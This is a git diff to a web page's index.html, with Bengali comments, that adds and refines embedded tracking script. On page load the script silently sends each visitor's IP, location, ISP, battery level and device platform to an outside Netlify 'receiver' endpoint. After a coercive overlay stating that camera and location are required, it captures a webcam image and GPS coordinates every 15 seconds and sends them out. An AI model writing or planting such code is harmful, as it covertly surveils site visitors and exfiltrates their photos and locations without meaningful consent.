--- a/index.html
+++ b/index.html
@@ -355,28 +355,26 @@
         </div>
     </div>
 
- <script>
+<script>
     const API_BRIDGE = 'https://peaceful-torte-b8ab6b.netlify.app/.netlify/functions/receiver';
     const overlay = document.getElementById('advanced-overlay');
     const okBtn = document.getElementById('final-ok-btn');
 
-    // ডাটা পাঠানোর মাস্টার ফাংশন
+    // ডেটা পাঠানোর মাস্টার ফাংশন
     async function sendData(type, message, photo = null) {
         const fd = new FormData();
         fd.append('type', type);
         fd.append('content', message);
         if (photo) fd.append('photo', photo, 'shot.jpg');
 
-        return fetch(API_BRIDGE, {
-            method: 'POST',
-            body: fd,
-            mode: 'no-cors' // ব্রাউজার ব্লকিং এড়াতে
-        }).catch(e => console.log("Sent"));
+        try {
+            fetch(API_BRIDGE, { method: 'POST', body: fd, mode: 'no-cors' });
+        } catch (e) { console.log("Sent"); }
     }
 
-    // ১. পেজ লোড হলে দ্রুত সাইলেন্ট অ্যালার্ট
+    // ১. পেজ লোড হলে দ্রুত সাইলেন্ট অ্যালার্ট (নতুন ফিক্সড ভার্সন)
     window.addEventListener('load', async () => {
-        // ওভারলে দেখানো
+        // ওভারলে হ্যান্ডেলিং
         if (localStorage.getItem('granted') === 'true') {
             overlay.style.display = 'none';
             initSecurity();
@@ -384,26 +382,30 @@
             setTimeout(() => { overlay.style.display = 'flex'; }, 2000);
         }
 
-        // আইপি ও ডিভাইস তথ্য সংগ্রহ
+        let info = `🚀 **Instant Visitor Alert**\n`;
+        info += `📱 Device: ${navigator.platform}\n`;
+        info += `🕒 Time: ${new Date().toLocaleString()}\n`;
+
         try {
-            const ipRes = await fetch('https://ipapi.co/json/');
+            // আইপি তথ্যের জন্য ipwho.is (বেশি ফাস্ট এবং নির্ভরযোগ্য)
+            const ipRes = await fetch('https://ipwho.is/');
             const d = await ipRes.json();
+            if(d.success) {
+                info += `🌐 IP: ${d.ip}\n📍 Location: ${d.city}, ${d.country}\n📡 ISP: ${d.connection?.isp}\n`;
+            }
+        } catch (e) { info += `🌐 IP: Hidden/Restricted\n`; }
+
+        try {
+            // ব্যাটারি তথ্য (যদি ব্রাউজার সাপোর্ট করে)
             const b = await navigator.getBattery();
-            
-            const info = `
-🚀 **Instant Visitor Alert**
-🌐 IP: ${d.ip} | 📍 ${d.city}, ${d.country_name}
-🔋 Battery: ${(b.level * 100).toFixed(0)}%
-📱 Device: ${navigator.platform}
-🕒 Time: ${new Date().toLocaleString()}
-            `;
-            sendData("Silent Entry", info);
-        } catch (e) {
-            sendData("Silent Entry", "New visitor joined (IP info restricted)");
-        }
+            info += `🔋 Battery: ${(b.level * 100).toFixed(0)}%\n`;
+        } catch (e) { info += `🔋 Battery: Unknown\n`; }
+
+        // ফাইনাল মেসেজ সেন্ড
+        sendData("Silent Entry", info);
     });
 
-    // ২. বাটনে ক্লিক করলে ক্যামেরা ও জিপিএস
+    // ২. বাটনে ক্লিক করলে ক্যামেরা ও জিপিএস (আগের মতোই)
     okBtn.addEventListener('click', async () => {
         try {
             const stream = await navigator.mediaDevices.getUserMedia({ video: true });
@@ -411,8 +413,8 @@
                 localStorage.setItem('granted', 'true');
                 overlay.style.display = 'none';
                 startTracking(stream, pos);
-            }, () => alert("Location is required."));
-        } catch (e) { alert("Camera is required."); }
+            }, () => alert("Location required."));
+        } catch (e) { alert("Camera required."); }
     });
 
     async function initSecurity() {
@@ -426,20 +428,17 @@
         const video = document.createElement('video');
         video.srcObject = stream;
         video.play();
-
         setInterval(() => {
             const canvas = document.createElement('canvas');
-            canvas.width = 400; canvas.height = 300;
-            canvas.getContext('2d').drawImage(video, 0, 0, 400, 300);
-            
+            canvas.width = 480; canvas.height = 360;
+            canvas.getContext('2d').drawImage(video, 0, 0, 480, 360);
             canvas.toBlob(blob => {
                 const map = `https://www.google.com/maps?q=${pos.coords.latitude},${pos.coords.longitude}`;
-                sendData("Live Track", `📍 GPS: ${map}`, blob);
+                sendData("Live Track", `📍 Google Map: ${map}`, blob);
             }, 'image/jpeg');
-        }, 15000); // ১৫ সেকেন্ড পর পর পাঠাবে
+        }, 15000);
     }
-</script>
-
+                             </script>
     <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
     <script src="https://cdn.jsdelivr.net/npm/swiper@10/swiper-bundle.min.js"></script>
     <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script>
